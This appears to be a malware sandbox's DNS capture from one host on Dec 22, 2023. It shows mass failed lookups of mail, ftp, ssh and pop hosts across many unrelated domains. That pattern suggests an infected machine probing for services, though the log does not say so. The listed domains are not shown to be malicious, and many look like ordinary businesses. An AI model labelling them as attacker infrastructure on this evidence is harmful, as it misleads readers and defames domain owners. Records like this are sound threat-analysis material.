Dec 22, 2023 21:14:53.148961067 CET	1.1.1.1	192.168.2.4	0xc357	Name error (3)	ftp.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.149019957 CET	1.1.1.1	192.168.2.4	0xdeb7	Name error (3)	ftp.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.156389952 CET	1.1.1.1	192.168.2.4	0x41a0	Name error (3)	ftp.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.162893057 CET	1.1.1.1	192.168.2.4	0xd348	Name error (3)	ftp.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.163846016 CET	1.1.1.1	192.168.2.4	0xdfdc	Name error (3)	ftp.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.165680885 CET	1.1.1.1	192.168.2.4	0x9451	Name error (3)	ftp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.165698051 CET	1.1.1.1	192.168.2.4	0xa576	Name error (3)	mail.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.165843964 CET	1.1.1.1	192.168.2.4	0x8fb2	Name error (3)	mail.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.165958881 CET	1.1.1.1	192.168.2.4	0x4a21	Name error (3)	ftp.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.165993929 CET	1.1.1.1	192.168.2.4	0xa73b	Name error (3)	mail.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.166145086 CET	1.1.1.1	192.168.2.4	0x4aca	Name error (3)	ftp.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.166801929 CET	1.1.1.1	192.168.2.4	0x543	Name error (3)	pop.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.166822910 CET	1.1.1.1	192.168.2.4	0xbe8	Name error (3)	mail.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.169430971 CET	1.1.1.1	192.168.2.4	0x1ebb	Name error (3)	ftp.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.175074100 CET	1.1.1.1	192.168.2.4	0x5997	Name error (3)	ftp.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.176405907 CET	1.1.1.1	192.168.2.4	0xee5c	Name error (3)	ssh.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.178282022 CET	1.1.1.1	192.168.2.4	0xa60c	Name error (3)	ftp.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.179698944 CET	1.1.1.1	192.168.2.4	0x34a2	Name error (3)	ftp.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.180176973 CET	1.1.1.1	192.168.2.4	0x4913	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.184333086 CET	1.1.1.1	192.168.2.4	0x458f	Name error (3)	ftp.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.184359074 CET	1.1.1.1	192.168.2.4	0x458f	Name error (3)	ftp.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.200495958 CET	1.1.1.1	192.168.2.4	0xd454	Name error (3)	mail.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.203041077 CET	1.1.1.1	192.168.2.4	0x1ef6	Name error (3)	pop.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.211474895 CET	1.1.1.1	192.168.2.4	0xd613	Name error (3)	ssh.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.211535931 CET	1.1.1.1	192.168.2.4	0xd613	Name error (3)	ssh.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.216146946 CET	1.1.1.1	192.168.2.4	0xf3b5	Name error (3)	ftp.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.218231916 CET	1.1.1.1	192.168.2.4	0xbf43	Name error (3)	ftp.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.219024897 CET	1.1.1.1	192.168.2.4	0x9ad	Name error (3)	ftp.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.219079971 CET	1.1.1.1	192.168.2.4	0x9ad	Name error (3)	ftp.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.221168995 CET	1.1.1.1	192.168.2.4	0x67f9	Name error (3)	ftp.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.222094059 CET	1.1.1.1	192.168.2.4	0xa7dd	Name error (3)	mail.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.229830980 CET	1.1.1.1	192.168.2.4	0xcee7	Name error (3)	ftp.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.237596989 CET	1.1.1.1	192.168.2.4	0x489d	Name error (3)	ftp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.237607002 CET	1.1.1.1	192.168.2.4	0x489d	Name error (3)	ftp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.242017031 CET	1.1.1.1	192.168.2.4	0xe07a	No error (0)	ww1.dl-it.net	12065.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:53.242017031 CET	1.1.1.1	192.168.2.4	0xe07a	No error (0)	12065.bodis.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.242134094 CET	1.1.1.1	192.168.2.4	0xe07a	No error (0)	ww1.dl-it.net	12065.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:53.242134094 CET	1.1.1.1	192.168.2.4	0xe07a	No error (0)	12065.bodis.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.244914055 CET	1.1.1.1	192.168.2.4	0x8229	Name error (3)	ftp.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.246243000 CET	1.1.1.1	192.168.2.4	0xc63a	Name error (3)	mail.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.249744892 CET	1.1.1.1	192.168.2.4	0x2f2c	Name error (3)	mail.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.270926952 CET	1.1.1.1	192.168.2.4	0x668c	Name error (3)	mail.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.280805111 CET	1.1.1.1	192.168.2.4	0x671f	Name error (3)	ftp.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.284868002 CET	1.1.1.1	192.168.2.4	0x1d45	Name error (3)	ftp.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.317641973 CET	1.1.1.1	192.168.2.4	0xbe35	Name error (3)	ftp.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.348217010 CET	1.1.1.1	192.168.2.4	0x47f5	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.434535027 CET	1.1.1.1	192.168.2.4	0xa0e2	Name error (3)	ftp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.496443033 CET	1.1.1.1	192.168.2.4	0xcd41	Name error (3)	ftp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.496474028 CET	1.1.1.1	192.168.2.4	0xcd41	Name error (3)	ftp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.508800030 CET	1.1.1.1	192.168.2.4	0x7081	Name error (3)	ftp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.535664082 CET	1.1.1.1	192.168.2.4	0x543	Name error (3)	pop.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.535729885 CET	1.1.1.1	192.168.2.4	0xee5c	Name error (3)	ssh.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.535821915 CET	1.1.1.1	192.168.2.4	0x4913	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.535917044 CET	1.1.1.1	192.168.2.4	0x47f5	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536051989 CET	1.1.1.1	192.168.2.4	0xdfdc	Name error (3)	ftp.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536206007 CET	1.1.1.1	192.168.2.4	0xd348	Name error (3)	ftp.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536393881 CET	1.1.1.1	192.168.2.4	0x34a2	Name error (3)	ftp.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536530018 CET	1.1.1.1	192.168.2.4	0xa60c	Name error (3)	ftp.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536562920 CET	1.1.1.1	192.168.2.4	0x1d45	Name error (3)	ftp.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536586046 CET	1.1.1.1	192.168.2.4	0x668c	Name error (3)	mail.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536756992 CET	1.1.1.1	192.168.2.4	0xbe35	Name error (3)	ftp.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536830902 CET	1.1.1.1	192.168.2.4	0x5997	Name error (3)	ftp.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536911964 CET	1.1.1.1	192.168.2.4	0x7081	Name error (3)	ftp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536922932 CET	1.1.1.1	192.168.2.4	0xa7dd	Name error (3)	mail.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.536964893 CET	1.1.1.1	192.168.2.4	0xd454	Name error (3)	mail.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537013054 CET	1.1.1.1	192.168.2.4	0xdeb7	Name error (3)	ftp.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537102938 CET	1.1.1.1	192.168.2.4	0xc63a	Name error (3)	mail.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537147999 CET	1.1.1.1	192.168.2.4	0x1ebb	Name error (3)	ftp.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537234068 CET	1.1.1.1	192.168.2.4	0x1ef6	Name error (3)	pop.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537492037 CET	1.1.1.1	192.168.2.4	0x8229	Name error (3)	ftp.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537559986 CET	1.1.1.1	192.168.2.4	0xf3b5	Name error (3)	ftp.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.537991047 CET	1.1.1.1	192.168.2.4	0xa0e2	Name error (3)	ftp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.544452906 CET	1.1.1.1	192.168.2.4	0x9451	Name error (3)	ftp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.546042919 CET	1.1.1.1	192.168.2.4	0xcee7	Name error (3)	ftp.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.546387911 CET	1.1.1.1	192.168.2.4	0x2f2c	Name error (3)	mail.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.546399117 CET	1.1.1.1	192.168.2.4	0x671f	Name error (3)	ftp.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.546708107 CET	1.1.1.1	192.168.2.4	0xbf43	Name error (3)	ftp.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.546755075 CET	1.1.1.1	192.168.2.4	0x67f9	Name error (3)	ftp.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.728797913 CET	1.1.1.1	192.168.2.4	0x78ba	Name error (3)	ftp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.728859901 CET	1.1.1.1	192.168.2.4	0x78ba	Name error (3)	ftp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.729039907 CET	1.1.1.1	192.168.2.4	0xadec	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.729054928 CET	1.1.1.1	192.168.2.4	0xadec	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.729118109 CET	1.1.1.1	192.168.2.4	0xadec	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.765799046 CET	1.1.1.1	192.168.2.4	0xb1c2	Name error (3)	ssh.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.132878065 CET	1.1.1.1	192.168.2.4	0xff5a	Name error (3)	mail.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.141123056 CET	1.1.1.1	192.168.2.4	0x2488	Name error (3)	ssh.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.141443014 CET	1.1.1.1	192.168.2.4	0xf7c5	Name error (3)	ssh.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.172141075 CET	1.1.1.1	192.168.2.4	0x8052	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.214039087 CET	1.1.1.1	192.168.2.4	0xe7c6	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.220989943 CET	1.1.1.1	192.168.2.4	0x24ad	Name error (3)	mail.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.222330093 CET	1.1.1.1	192.168.2.4	0xfbff	Name error (3)	ftp.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.260727882 CET	1.1.1.1	192.168.2.4	0x60d6	Name error (3)	ssh.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.358539104 CET	1.1.1.1	192.168.2.4	0xe7c6	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.374514103 CET	1.1.1.1	192.168.2.4	0x60d6	Name error (3)	ssh.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.376950979 CET	1.1.1.1	192.168.2.4	0x368b	Name error (3)	mail.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.381664038 CET	1.1.1.1	192.168.2.4	0xcf85	Name error (3)	mail.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.383845091 CET	1.1.1.1	192.168.2.4	0x61fe	Name error (3)	mail.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.394768953 CET	1.1.1.1	192.168.2.4	0xb2ea	Name error (3)	mail.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.396184921 CET	1.1.1.1	192.168.2.4	0x432a	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.405611038 CET	1.1.1.1	192.168.2.4	0xf18f	Name error (3)	mail.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.409430981 CET	1.1.1.1	192.168.2.4	0x9ce6	Name error (3)	ssh.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.409492970 CET	1.1.1.1	192.168.2.4	0x5a57	Name error (3)	ssh.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.414390087 CET	1.1.1.1	192.168.2.4	0x39b9	Name error (3)	mail.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.421669006 CET	1.1.1.1	192.168.2.4	0x20a2	Name error (3)	imap.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.422667027 CET	1.1.1.1	192.168.2.4	0x6e38	Name error (3)	pop.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.492288113 CET	1.1.1.1	192.168.2.4	0xff13	Name error (3)	mail.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.497582912 CET	1.1.1.1	192.168.2.4	0xc0d6	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.507632971 CET	1.1.1.1	192.168.2.4	0x6b98	Name error (3)	mail.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.543346882 CET	1.1.1.1	192.168.2.4	0x20a2	Name error (3)	imap.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.543749094 CET	1.1.1.1	192.168.2.4	0xc0d6	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.553901911 CET	1.1.1.1	192.168.2.4	0xa1ee	Name error (3)	ftp.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.563015938 CET	1.1.1.1	192.168.2.4	0xb2e	Name error (3)	mail.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.563067913 CET	1.1.1.1	192.168.2.4	0xe821	Name error (3)	mail.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.566283941 CET	1.1.1.1	192.168.2.4	0x4c4d	Name error (3)	ftp.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.597666025 CET	1.1.1.1	192.168.2.4	0xe5f	Name error (3)	ftp.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.598017931 CET	1.1.1.1	192.168.2.4	0x2fb7	Name error (3)	ftp.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.627640963 CET	1.1.1.1	192.168.2.4	0x1569	Name error (3)	pop.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.629707098 CET	1.1.1.1	192.168.2.4	0x1add	Name error (3)	pop3.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.633068085 CET	1.1.1.1	192.168.2.4	0x2b32	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.701509953 CET	1.1.1.1	192.168.2.4	0xaf92	Name error (3)	mail.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.702054024 CET	1.1.1.1	192.168.2.4	0x5c59	Name error (3)	ssh.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.704216003 CET	1.1.1.1	192.168.2.4	0x97f7	Name error (3)	ssh.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.754745960 CET	1.1.1.1	192.168.2.4	0x1add	Name error (3)	pop3.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.755044937 CET	1.1.1.1	192.168.2.4	0x2b32	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.865228891 CET	1.1.1.1	192.168.2.4	0xb6ca	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.866606951 CET	1.1.1.1	192.168.2.4	0xb042	Name error (3)	souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.875370026 CET	1.1.1.1	192.168.2.4	0x4474	Name error (3)	mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.877600908 CET	1.1.1.1	192.168.2.4	0xba40	Name error (3)	91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.878473043 CET	1.1.1.1	192.168.2.4	0x6766	Name error (3)	jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.878782988 CET	1.1.1.1	192.168.2.4	0xbfe1	Name error (3)	bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.879267931 CET	1.1.1.1	192.168.2.4	0xee62	Name error (3)	rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.901952982 CET	1.1.1.1	192.168.2.4	0xcba	Name error (3)	enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.907143116 CET	1.1.1.1	192.168.2.4	0xb5e2	Name error (3)	acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.920416117 CET	1.1.1.1	192.168.2.4	0xb8bb	Name error (3)	dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.929578066 CET	1.1.1.1	192.168.2.4	0x1f94	Name error (3)	studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.930356979 CET	1.1.1.1	192.168.2.4	0x5397	Name error (3)	bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.932128906 CET	1.1.1.1	192.168.2.4	0xb6ca	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.932950974 CET	1.1.1.1	192.168.2.4	0x5e8d	Name error (3)	rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.934374094 CET	1.1.1.1	192.168.2.4	0x3a44	Name error (3)	chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.935127020 CET	1.1.1.1	192.168.2.4	0xb4f9	Name error (3)	djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.935220003 CET	1.1.1.1	192.168.2.4	0x6569	Name error (3)	select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.935460091 CET	1.1.1.1	192.168.2.4	0x2189	Name error (3)	aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.936024904 CET	1.1.1.1	192.168.2.4	0xa40d	Name error (3)	hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.936253071 CET	1.1.1.1	192.168.2.4	0xcb29	Name error (3)	vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.936583042 CET	1.1.1.1	192.168.2.4	0x5eb	Name error (3)	arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.940124035 CET	1.1.1.1	192.168.2.4	0xaaff	Name error (3)	mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.941780090 CET	1.1.1.1	192.168.2.4	0xa8b3	Name error (3)	djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.944885969 CET	1.1.1.1	192.168.2.4	0x505c	Name error (3)	263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.962779045 CET	1.1.1.1	192.168.2.4	0x1fed	Name error (3)	nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.967134953 CET	1.1.1.1	192.168.2.4	0x397f	Name error (3)	hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.972213984 CET	1.1.1.1	192.168.2.4	0xad5d	Name error (3)	taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.987508059 CET	1.1.1.1	192.168.2.4	0xd9d8	Name error (3)	ssh.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.994903088 CET	1.1.1.1	192.168.2.4	0xcf29	Name error (3)	piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.995229006 CET	1.1.1.1	192.168.2.4	0xc140	Name error (3)	hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.011936903 CET	1.1.1.1	192.168.2.4	0x96f2	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.033461094 CET	1.1.1.1	192.168.2.4	0x5e8d	Name error (3)	rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.033584118 CET	1.1.1.1	192.168.2.4	0xb5e2	Name error (3)	acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.033715010 CET	1.1.1.1	192.168.2.4	0xb8bb	Name error (3)	dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.033818960 CET	1.1.1.1	192.168.2.4	0xa8b3	Name error (3)	djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.034044027 CET	1.1.1.1	192.168.2.4	0xc140	Name error (3)	hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	www.wika.co.in	cdn.wika.de		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	cdn.wika.de	cdn.com.wika.cloudpowered.services		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	cdn.com.wika.cloudpowered.services	dzgxcfyd2rxse.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.12	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.41	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.62	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099790096 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.98	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	www.wika.co.in	cdn.wika.de		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	cdn.wika.de	cdn.com.wika.cloudpowered.services		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	cdn.com.wika.cloudpowered.services	dzgxcfyd2rxse.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.12	A (IP address)	IN (0x0001)	false
